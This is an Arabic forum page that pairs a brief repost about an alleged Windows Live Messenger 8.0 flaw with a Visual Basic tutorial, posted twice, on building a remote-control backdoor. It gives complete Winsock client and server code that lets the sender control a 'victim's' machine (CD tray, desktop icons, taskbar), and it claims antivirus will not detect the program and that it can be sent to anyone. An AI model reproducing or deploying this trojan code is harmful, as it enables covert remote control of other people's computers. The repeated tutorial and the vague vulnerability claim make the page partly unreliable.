الملفات المرفقة

kav6_license.rar‏

مصيبة وقد حدثت هذا
ومع البحث والتفتيش حول هذه المشكلة وجدت الاتى واليكم اخوانى نتيجة البحث وما وجدته على النت خير دليل على كلامى
الرجاء حذف ماسنجر Windows Live Messenger 8.0


فوراً رغم مميزاته الرائعه والمتعددة والرجوع للاصدار 7.5



لمـــاذا ؟


بسبب اكتشاف ثغرة امنية


فعند استخدامك لهذا الاصدار يصبح جهازك مكشوفاً للمتطفلين الهكرز خاصةً ان البعض يترك الماسنجر مفتوح طوال الوقت عند استخدامه الـ DSL




ماهو سبب وجود هذه الثغرة؟


سبب وجود الثغرة هو وجود خطأ في البرمجة وهو خطأ في معالجة ملف الـ ctt والذي لم يتم ايجاد حل له حتى الان





مالذي قد يسببه هذا الخطأ؟


بالنسبة للملف ctt هو الذي يقوم بحفظ قائمة المتصلين Contact List وعند تشغيل الماسنجر سوف يتم طلب قائمة الاتصال من الملف ctt تلقائياً لعرضها لديك في الماسنجر


بالاضافة الى تمكين المتجسسين من الهاكرز اختراق جهازك فقد تتفاجأ حينما تجد ان قائمة الاتصال لديك محذوفه او نصفها على الاقل


مع ارق التحايا واعذبها

منقول للفائدة

صمم برنامج هكر بنفسك



سوف نتحدث إن شاء الله عن فكرة برمجة برامج الاختراق الشهيرة وكيف تتم برمجتها وتشغيلها ثم سوف نقوم بعمل برنامج بالفيجوال بيسك وذلك لتوضيح الموضوع واستيعابه بشكل أفضل....
حسناً . . لنبدأ الآن بشرح تفاصيل الموضوع وعلى بركة الله:
تتكون هذه البرامج كما هو معروف من جزئين أو برنامجين يسمى الأول بملف العميل والآخر ملف الخادم
1-كيفية الاتصال بين الملفين عبر الانترنت
يتم الاتصال بين الملفين العميل والخادم باستخدام بروتوكول tcp/ip

حيث يتم الاتصال بين الملفين العميل والخادم بمعرفة رقم الايبي ورقم المنفذ للبرنامج الخادم على جهاز الضحية

بالنسبة لرقم الايبي للخادم فهو رقم الايبي الخاص بجهاز الضحية عند دخوله على شبكة الانترنت

أما بالنسبة لرقم المنفذ فيتم تحديده برمجياً أثناء عمل البرنامج ولا يمكن تعديله إذا تم وضعه في جهاز الضحية وهو رقم يتراوح بين 1 إلى 65535 تقريباً
وإذا اضطر الأمر لتعديل رقم المنفذ فيجب زرع نسخة جديدة من ملف الخادم في جهاز الضحية مرة أخرى بعد التعديل
عندما يبدأ برنامج الخادم بالعمل عند تشغيله يقوم بعمل خط اتصال وينتظر أي طلب اتصال قادم من الانترنت

في هذه الحالة يقوم الشخص الذي يملك البرنامج العميل ويعرف رقم الايبي ورقم المنفذ الصحيح بالخادم بعمل اتصال مع الخادم ويكتمل الاتصال بين الجهازين بعد ذلك يبدأ برنامج العميل بإرسال الأوامر ويقوم الخادم باستقبال هذه الأوامر وتنفيذ المطلوب منه ثم يقوم بإرسال نتائج الأوامر مرة أخرى إلى العميل
هذه هي الفكرة ببساطة شديدة أرجو أن تكون واضحة للجميع

2-خطوات عمل برنامج بالفيجوال بيسك للتجسس .
برنامج العميل
كما ذكرنا بخصوص العميل فهو الذي يتحكم بالعملية كلها وهو الذي يرسل الأوامر للبرنامج الخادم وسوف نقوم الآن بشرح خطوات تنفيذ برنامج عميل

الخطوة الأولى : معرفة رقم الايبي ورقم المنفذ للبرنامج الخادم وإجراء الاتصال

الخطوة الثانية : ينتظر البرنامج السماح بالاتصال من البرنامج الخادم ثم يتم الاتصال بين الجهازين

الخطوة الثالثة : يقوم البرنامج بإرسال الأوامر للبرنامج الخادم والذي بدوره يقوم بالرد بالمعلومات المطلوبة .

برنامج الخادم

يقوم هذا البرنامج بعمل اتصال بالانترنت وينتظر أي طلب اتصال معه وإذا قام برنامج العميل بكتابة رقم الايبي ورقم المنفذ الصحيح فانه يتم الاتصال بين الطرفين ويبدأ البرنامج الخادم باستقبال الأوامر من البرنامج العميل المتصل به وينفذ ما هو مطلوب منه على جهاز الضحية مثل تنفيذ بعض الأعمال التخريبية أو قراءة معلومات خاصة وإرسالها للبرنامج العميل.
سنقوم الآن بتصميم برنامج صغير لتوضيح فكرة إرسال الأوامر إلى البرنامج الخادم واستقبال البرنامج الخادم لهذه الأوامر وتنفيذها

البرنامج كما ذكرنا سابقا يتكون من جزئين برنامج عميل وبرنامج خادم

.....................
تصميم البرنامج العميل
أولا . . يتم إدراج أداة MS WINSOCK للمشروع ويتم تغيير اسم الأداة إلى wskclient

ثانياً . . يتم إدراج TIMER

ثالثاً . . يتم وضع أزارير لعملية الاتصال وقطع الاتصال

رابعاً . . يتم ادراج 2 مربع نص لكتابة رقم الايبي ورقم المنفذ srvrip.Text srvrport.Text

خامساً . . يتم وضع أزارير للأوامر المراد إرسالها للبرنامج الخادم
كتابة شيفرة ( كود ) البرنامج العميل [Client]

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع

1. إجراء عملية الاتصال مع الخادم wskclient.Connect srvrip.Text, srvrport.Text

2. عملية إرسال الأوامر إلى البرنامج الخادم "wskclient.SendData "openCD

3. مراقبة حالة الاتصال wskclient.State = 0
أهم القيم المستخدمة في مراقبة حالة الاتصال

0 " لا يوجد اتصال "

7 " تم الاتصال "

8 " قام الخادم بقطع الاتصال "

9 " خطأ في الاتصال "

تصميم البرنامج الخادم

أولاً . . إدراج أداة MS WINSOCK للمشروع

ثانياً . . كتابة الكود للبرنامج الخادم مع ملاحظة انه تم تعيين رقم المنفذ (2000) للبرنامج ويمكن تغييره في الكود لأي رقم آخر من 1 - 65535

ثالثاً . . تصميم البرنامج ليعمل تلقائياً بعد تشغيله
كتابة شيفرة ( كود ) البرنامج الخادم [Server]

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع

1. تحديد منفذ الاتصال wskServer.LocalPort = 2000

2. إجراء عملية الاتصال wskServer.Listen

3. قبول طلب البرنامج العميل بالاتصال مع البرنامج الخادم

Private Sub wskServer_ConnectionRequest(ByVal requestID As Long)

If wskServer.State <> sckClosed Then

wskServer.Close

wskServer.Accept requestID

End Sub


عملية استقبال الأوامر من البرنامج العميل ( يتم تعريف متغير يقوم باستقبال الأوامر من العميل )

Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)

Dim command As String

wskServer.GetData command

End Sub


الحين نصممه خطوه بخطوه:
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
هذا البرنامج يمثل برنامج العميل
بستخدام تقنية tcp/ip
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
الحين انشئ زر واسمه اتصال
اوكتب هذا الكود
Private Sub Command1_Click()
wskclient.Close
'يجب التأكد من أن الإتصال مغلق قبل عمل إتصال جديد
If srvrip.Text = "" Then
MsgBox "IP يجب كتابة رقم"
Exit Sub
End If
If srvrport.Text = "" Then
MsgBox "يجب كتابة رقم المنفذ"
' يجب كتابة رقم منفذ
Exit Sub
End If
If srvrport.Text > 65535 Then
MsgBox "رقم المنفذ بين 1 - 65535"
' يجب التأكد من رقم المنفذ الصحيح
Text2.Text = ""
Exit Sub
End If
wskclient.Connect srvrip.Text, srvrport.Text
'هذا السطر يمثل عملية الإتصال بالخادم
'(Port)ورقم المنفذIP يتم الإتصال بالخادم عن طريق تحديد رقم
'عند الضغط على زر "إتصال" يتم إجراء الإتصال
Command1.Enabled = False
'تعطيل زر "اتصال" عند اجراء الاتصال
End Sub

---------------------------------------------------------
---------------------------------------------------------
انشئ رز واسمه انهاء الاتصال
واكتب هذا الكود
Private Sub Command2_Click()
wskclient.Close
' "يتم إغلاق الإتصال عند الضغط على زر "انهاء الاتصال
Command1.Enabled = True
'تمكين الزر "اتصال" عند قطع الاتصال
End Sub
----------------------------------------------------------
----------------------------------------------------------
انشئ زر واسمه فتح سواقه الليزر
واكتب هذا الكود
Private Sub Command3_Click()
On Error Resume Next
wskclient.SendData "openCD"
End Sub
---------------------------------------
---------------------------------------
انشئ زر واسمه اغلاق سواقه الليزر
واكتب هذا الكود
Private Sub Command4_Click()
On Error Resume Next
wskclient.SendData "closeCD"
End Sub
----------------------------------------
----------------------------------------
انشئ زر واسمه اخفاء ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command5_Click()
On Error Resume Next
wskclient.SendData "hideDESKTOP"
End Sub
-------------------------------------
--------------------------------------
انشئ زر واسمه اضهار ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command6_Click()
On Error Resume Next
wskclient.SendData "showDESKTOP"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اخفاء زر ابداء
واكتب هذا الكود
Private Sub Command8_Click()
On Error Resume Next
wskclient.SendData "hideSTART"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اضهار زر ابداء
واكتب هذا الامر
Private Sub Command9_Click()
On Error Resume Next
wskclient.SendData "showSTART"
End Sub
------------------------------------------
-----------------------------------------
انشئ زر واسمه اخفاء شريط المهام
واكتب هذا الكود
Private Sub Command10_Click()
On Error Resume Next
wskclient.SendData "hideTASKBAR"
End Sub
-----------------------------------------------
-----------------------------------------------
انشئ زر واسمه اضهار شريط المهام
واكتب هذا الكود
Private Sub Command11_Click()
On Error Resume Next
wskclient.SendData "showTASKBAR"
End Sub
----------------------------------------------
----------------------------------------------
الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال
---------------------------------------------------------------------
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram
اوكتب هذا الكود فيه
Private Sub Timer1_Timer()
If wskclient.State = 0 Then status.Caption = "لايوجد إتصال"
If wskclient.State = 6 Then status.Caption = "جاري الإتصال"
If wskclient.State = 7 Then status.Caption = "تم الإتصال مع الخادم"
If wskclient.State = 8 Then status.Caption = "قام الخادم بقطع الإتصال"
If wskclient.State = 9 Then status.Caption = "خطأ في الإتصال"
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم
If wskclient.State <> sckConnected Then
status.Caption = "لايوجد إتصال"
End If
End Sub
-------------------------------
------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي
----------------------------------
----------------------------------
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه
ip
-----------------------------
-----------------------------
الحين انشئ text box وضعها امام label الذي سميناه ip
------------------------------
-----------------------------
الحين انشئ label وسمه port
-------------------------------------
الحين انشئ text box وضعها امام label الي سميناه port
--------------------------------------
الحين انشئ label واتركه فارغا وضعه اسفل الفورم
------------------------------------------------------------------
------------------------------------------------------------------
------------------------------------------------------------------
الحين نكتب برنامج الخادم
انشئ فورم جديد واكتب هذا الكود فيه
Private Sub Form_Load()
'wskServer اسم اداة الوينسوكت في هذا البرنامج
wskServer.LocalPort = 2003
' تعيين منفذ للخادم
wskServer.Listen
' بدء تشغيل الخادم
TaskBarHwnd = FindWindow("Shell_traywnd", "")
' يقوم البرنامج بتحديد تعريف شريط المهام
End Sub
---------------------------------------
---------------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub
Private Sub wskServer_ConnectionRequest(ByVal requestID As Long)
If wskServer.State <> sckClosed Then _
wskServer.Close
wskServer.Accept requestID
' قبول طلب الاتصال
End Sub

'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ====
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)
Dim command As String
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل
wskServer.GetData command
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل

Select Case command ' تحديد الأمر القادم من البرنامج العميل
Case "openCD" ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي
CDOpen
Case "closeCD"
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي
Case "hideDESKTOP" ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_HIDE)
Case "showDESKTOP" ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_SHOW)
Case "hideSTART" ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي
HideStartButton
Case "showSTART" ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي
ShowStartButton
Case "hideTASKBAR" ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW)
Case "showTASKBAR" ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_SHOWWINDOW)
End Select

End Sub

--------------------------
---------------------------
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون
---------------------------------------------
----------------------------------------------
الحين انشئ موديل واكتب هذا الكود فيها

' API CALLS
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Public Const SW_HIDE = 0
Public Const SW_SHOW = 5

Const SWP_HIDEWINDOW = &H80
Const SWP_SHOWWINDOW = &H40
'دالة اخفاء زر ابدأ
Sub HideStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 0
End Sub
' دالة اظهار زر ابدأ
Sub ShowStartButton()
Dim Handle As Long, FindClass As Long
FindClass& = FindWindow("Shell_TrayWnd", "")
Handle& = FindWindowEx(FindClass&, 0, "Button", vbNullString)
ShowWindow Handle&, 1
End Sub

'دالة اغلاق سواقة الليزر
Sub CDClose()
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Sub

'دالة فتح سواقة الليزر
Sub CDOpen()
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub
-----------------------------------
-----------------------------------
الحين سلامتك البرنامج الباكدور الي سويناه ارسلة لاي شخص تبيه مع العلم ان الانتي فايروس ماراح يكتشفه
والبرنامج الي عندك راح تتحكم فيه



وهذا ايضا موضوع اخر في صناعة برامج الهكر



اصنع برنامج هاكر بنفسك....بالفجول بسك:::منقول
ملحوظه مهمة: الرجاء عدم استخدام اي برنامج من صنعك او من صنع غيرك ضد المسلمين والهكر العربي بريئ من الذي يفعل ذلك الى يوم الدين والان نبدا الموضوع خطوة بخطوة


الجزئ الاول
+++=(كيف تصمم برنامج اختراق بنفسك)=+++
..............سوف نتحدث إن شاء الله عن فكرة برمجة برامج الاختراق الشهيرة وكيف تتم برمجتها وتشغيلها ثم سوف نقوم بعمل برنامج بالفيجوال بيسك وذلك لتوضيح الموضوع واستيعابه بشكل أفضل....
حسناً . . لنبدأ الآن بشرح تفاصيل الموضوع وعلى بركة الله:
تتكون هذه البرامج كما هو معروف من جزئين أو برنامجين يسمى الأول بملف العميل والآخر ملف الخادم
1-
كيفية الاتصال بين الملفين عبر الانترنت
يتم الاتصال بين الملفين العميل والخادم باستخدام بروتوكول tcp/ip

حيث يتم الاتصال بين الملفين العميل والخادم بمعرفة رقم الايبي ورقم المنفذ للبرنامج الخادم على جهاز الضحية

بالنسبة لرقم الايبي للخادم فهو رقم الايبي الخاص بجهاز الضحية عند دخوله على شبكة الانترنت

أما بالنسبة لرقم المنفذ فيتم تحديده برمجياً أثناء عمل البرنامج ولا يمكن تعديله إذا تم وضعه في جهاز الضحية وهو رقم يتراوح بين 1 إلى 65535 تقريباً
وإذا اضطر الأمر لتعديل رقم المنفذ فيجب زرع نسخة جديدة من ملف الخادم في جهاز الضحية مرة أخرى بعد التعديل
عندما يبدأ برنامج الخادم بالعمل عند تشغيله يقوم بعمل خط اتصال وينتظر أي طلب اتصال قادم من الانترنت

في هذه الحالة يقوم الشخص الذي يملك البرنامج العميل ويعرف رقم الايبي ورقم المنفذ الصحيح بالخادم بعمل اتصال مع الخادم ويكتمل الاتصال بين الجهازين بعد ذلك يبدأ برنامج العميل بإرسال الأوامر ويقوم الخادم باستقبال هذه الأوامر وتنفيذ المطلوب منه ثم يقوم بإرسال نتائج الأوامر مرة أخرى إلى العميل
هذه هي الفكرة ببساطة شديدة أرجو أن تكون واضحة للجميع

2-خطوات عمل برنامج بالفيجوال بيسك للتجسس .
برنامج العميل
كما ذكرنا بخصوص العميل فهو الذي يتحكم بالعملية كلها وهو الذي يرسل الأوامر للبرنامج الخادم وسوف نقوم الآن بشرح خطوات تنفيذ برنامج عميل

الخطوة الأولى : معرفة رقم الايبي ورقم المنفذ للبرنامج الخادم وإجراء الاتصال

الخطوة الثانية : ينتظر البرنامج السماح بالاتصال من البرنامج الخادم ثم يتم الاتصال بين الجهازين

الخطوة الثالثة : يقوم البرنامج بإرسال الأوامر للبرنامج الخادم والذي بدوره يقوم بالرد بالمعلومات المطلوبة .

برنامج الخادم

يقوم هذا البرنامج بعمل اتصال بالانترنت وينتظر أي طلب اتصال معه وإذا قام برنامج العميل بكتابة رقم الايبي ورقم المنفذ الصحيح فانه يتم الاتصال بين الطرفين ويبدأ البرنامج الخادم باستقبال الأوامر من البرنامج العميل المتصل به وينفذ ما هو مطلوب منه على جهاز الضحية مثل تنفيذ بعض الأعمال التخريبية أو قراءة معلومات خاصة وإرسالها للبرنامج العميل.
سنقوم الآن بتصميم برنامج صغير لتوضيح فكرة إرسال الأوامر إلى البرنامج الخادم واستقبال البرنامج الخادم لهذه الأوامر وتنفيذها

البرنامج كما ذكرنا سابقا يتكون من جزئين برنامج عميل وبرنامج خادم

.....................
تصميم البرنامج العميل
أولا . . يتم إدراج أداة MS WINSOCK للمشروع ويتم تغيير اسم الأداة إلى wskclient

ثانياً . . يتم إدراج TIMER

ثالثاً . . يتم وضع أزارير لعملية الاتصال وقطع الاتصال

رابعاً . . يتم ادراج 2 مربع نص لكتابة رقم الايبي ورقم المنفذ srvrip.Text srvrport.Text

خامساً . . يتم وضع أزارير للأوامر المراد إرسالها للبرنامج الخادم
كتابة شيفرة ( كود ) البرنامج العميل [Client]

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع

1. إجراء عملية الاتصال مع الخادم wskclient.Connect srvrip.Text, srvrport.Text

2. عملية إرسال الأوامر إلى البرنامج الخادم "wskclient.SendData "openCD

3. مراقبة حالة الاتصال wskclient.State = 0
أهم القيم المستخدمة في مراقبة حالة الاتصال

0 " لا يوجد اتصال "

7 " تم الاتصال "

8 " قام الخادم بقطع الاتصال "

9 " خطأ في الاتصال "

تصميم البرنامج الخادم

أولاً . . إدراج أداة MS WINSOCK للمشروع

ثانياً . . كتابة الكود للبرنامج الخادم مع ملاحظة انه تم تعيين رقم المنفذ (2000) للبرنامج ويمكن تغييره في الكود لأي رقم آخر من 1 - 65535

ثالثاً . . تصميم البرنامج ليعمل تلقائياً بعد تشغيله
كتابة شيفرة ( كود ) البرنامج الخادم [Server]

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع

1. تحديد منفذ الاتصال wskServer.LocalPort = 2000

2. إجراء عملية الاتصال wskServer.Listen

3. قبول طلب البرنامج العميل بالاتصال مع البرنامج الخادم

Private Sub wskServer_ConnectionRequest(By
Val requestID As Long)

If wskServer.State <> sckClosed Then

wskServer.Close

wskServer.Accept requestID

End Sub


عملية استقبال الأوامر من البرنامج العميل ( يتم تعريف متغير يقوم باستقبال الأوامر من العميل )

Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)

Dim command As String

wskServer.GetData command

End Sub
......................
.......................
الحين نصممه خطوه بخطوه:
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
هذا البرنامج يمثل برنامج العميل
بستخدام تقنية tcp/ip
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
الحين انشئ زر واسمه اتصال
اوكتب هذا الكود
Private Sub Command1_Click()
wskclient.Close
'يجب التأكد من أن الإتصال مغلق قبل عمل إتصال جديد
If srvrip.Text = "" Then
MsgBox "IP يجب كتابة رقم"
Exit Sub
End If
If srvrport.Text = "" Then
MsgBox "يجب كتابة رقم المنفذ"
' يجب كتابة رقم منفذ
Exit Sub
End If
If srvrport.Text > 65535 Then
MsgBox "رقم المنفذ بين 1 - 65535"
' يجب التأكد من رقم المنفذ الصحيح
Text2.Text = ""
Exit Sub
End If
wskclient.Connect srvrip.Text, srvrport.Text
'هذا السطر يمثل عملية الإتصال بالخادم
'(Port)ورقم المنفذIP يتم الإتصال بالخادم عن طريق تحديد رقم
'عند الضغط على زر "إتصال" يتم إجراء الإتصال
Command1.Enabled = False
'تعطيل زر "اتصال" عند اجراء الاتصال
End Sub

---------------------------------------------------------
---------------------------------------------------------
انشئ رز واسمه انهاء الاتصال
واكتب هذا الكود
Private Sub Command2_Click()
wskclient.Close
' "يتم إغلاق الإتصال عند الضغط على زر "انهاء الاتصال
Command1.Enabled = True
'تمكين الزر "اتصال" عند قطع الاتصال
End Sub


الجزئ الثاني

----------------------------------------------------------
انشئ زر واسمه فتح سواقه الليزر
واكتب هذا الكود
Private Sub Command3_Click()
On Error Resume Next
wskclient.SendData "openCD"
End Sub
---------------------------------------
---------------------------------------
انشئ زر واسمه اغلاق سواقه الليزر
واكتب هذا الكود
Private Sub Command4_Click()
On Error Resume Next
wskclient.SendData "closeCD"
End Sub
----------------------------------------
----------------------------------------
انشئ زر واسمه اخفاء
ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command5_Click()
On Error Resume Next
wskclient.SendData "hideDESKTOP"
End Sub
-------------------------------------
--------------------------------------
انشئ زر واسمه اضهار ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command6_Click()
On Error Resume Next
wskclient.SendData "showDESKTOP"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اخفاء زر ابداء
واكتب هذا الكود
Private Sub Command8_Click()
On Error Resume Next
wskclient.SendData "hideSTART"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اضهار زر ابداء
واكتب هذا الامر
Private Sub Command9_Click()
On Error Resume Next
wskclient.SendData "showSTART"
End Sub
------------------------------------------
-----------------------------------------
انشئ زر واسمه اخفاء شريط المهام
واكتب هذا الكود
Private Sub Command10_Click()
On Error Resume Next
wskclient.SendData "hideTASKBAR"
End Sub
-----------------------------------------------
-----------------------------------------------
انشئ زر واسمه اضهار شريط المهام
واكتب هذا الكود
Private Sub Command11_Click()
On Error Resume Next
wskclient.SendData "showTASKBAR"
End Sub
----------------------------------------------

الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال
---------------------------------------------------------------------
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram
اوكتب هذا الكود فيه
Private Sub Timer1_Timer()
If wskclient.State = 0 Then status.Caption = "لايوجد إتصال"
If wskclient.State = 6 Then status.Caption = "جاري الإتصال"
If wskclient.State = 7 Then status.Caption = "تم الإتصال مع الخادم"
If wskclient.State = 8 Then status.Caption = "قام الخادم بقطع الإتصال"
If wskclient.State = 9 Then status.Caption = "خطأ في الإتصال"
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم
If wskclient.State <> sckConnected Then
status.Caption = "لايوجد إتصال"
End If
End Sub
-------------------------------
------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي
----------------------------------
----------------------------------
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه
ip
-----------------------------
-----------------------------
الحين انشئ text box وضعها امام label الذي سميناه ip
------------------------------
-----------------------------
الحين انشئ label وسمه port
-------------------------------------
الحين انشئ text box وضعها امام label الي سميناه port
--------------------------------------
الحين انشئ label واتركه فارغا وضعه اسفل الفورم
------------------------------------------------------------------
------------------------------------------------------------------
------------------------------------------------------------------
الحين نكتب برنامج الخادم
انشئ فورم جديد واكتب هذا الكود فيه
Private Sub Form_Load()
'wskServer اسم اداة الوينسوكت في هذا البرنامج
wskServer.LocalPort = 2003
' تعيين منفذ للخادم
wskServer.Listen
' بدء تشغيل الخادم
TaskBarHwnd = FindWindow("Shell_traywnd", "")
' يقوم البرنامج بتحديد تعريف شريط المهام
End Sub
---------------------------------------
---------------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub
Private Sub wskServer_ConnectionRequest(By
Val requestID As Long)
If wskServer.State <> sckClosed Then _
wskServer.Close
wskServer.Accept requestID
' قبول طلب الاتصال
End Sub

'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ====
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)
Dim command As String
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل
wskServer.GetData command
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل

Select Case command ' تحديد الأمر القادم من البرنامج العميل
Case "openCD" ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي
CDOpen
Case "closeCD"
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي
Case "hideDESKTOP" ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_HIDE)
Case "showDESKTOP" ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_SHOW)
Case "hideSTART" ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي
HideStartButton
Case "showSTART" ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي
ShowStartButton
Case "hideTASKBAR" ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW)
Case "showTASKBAR" ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_SHOWWINDOW)
End Select

End Sub

--------------------------
---------------------------
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون
---------------------------------------------
----------------------------------------------
الحين انشئ موديل واكتب هذا الكود فيها

' API CALLS
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
